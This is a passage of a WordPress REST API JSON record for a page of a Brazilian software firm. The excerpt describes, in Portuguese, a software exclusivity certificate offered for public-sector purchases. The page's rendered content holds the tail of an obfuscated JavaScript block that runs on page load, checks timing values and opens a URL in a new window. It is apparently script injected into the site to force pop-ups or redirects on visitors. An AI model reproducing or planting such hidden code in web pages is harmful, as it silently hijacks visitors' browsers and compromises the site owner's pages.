Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Sendo a&nbsp; autora&nbsp; e&nbsp; \u00fanica&nbsp; fornecedora&nbsp; do&nbsp; produto&nbsp; no&nbsp; Brasil, a PLANET INFORM\u00c1TICA LTDA. disponibiliza aos seus clientes o documento Atestado de Exclusividade de Software, emitido pela Associa\u00e7\u00e3o das Empresas Brasileiras de Tecnologia da Informa\u00e7\u00e3o &#8211; ASSESPRO\/PR, com o objetivo de facilitar o processo de aquisi\u00e7\u00e3o do sistema por parte dos \u00d3rg\u00e3os P\u00fablicos Federais interessados. <a class=\"more-link\" href=\"https:\/\/planetdados.com.br\/?page_id=68\">Leia mais&#8230; &raquo;<\/a><\/p>\n","protected":false},"author":1,"featured_media":42,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/planetdados.com.br\/index.php?rest_route=\/wp\/v2\/pages\/68"}],"collection":[{"href":"https:\/\/planetdados.com.br\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/planetdados.com.br\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/planetdados.com.br\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/planetdados.com.br\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=68"}],"version-history":[{"count":19,"href":"https:\/\/planetdados.com.br\/index.php?rest_route=\/wp\/v2\/pages\/68\/revisions"}],"predecessor-version":[{"id":194,"href":"https:\/\/planetdados.com.br\/index.php?rest_route=\/wp\/v2\/pages\/68\/revisions\/194"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/planetdados.com.br\/index.php?rest_route=\/wp\/v2\/media\/42"}],"wp:attachment":[{"href":"https:\/\/planetdados.com.br\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=68"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}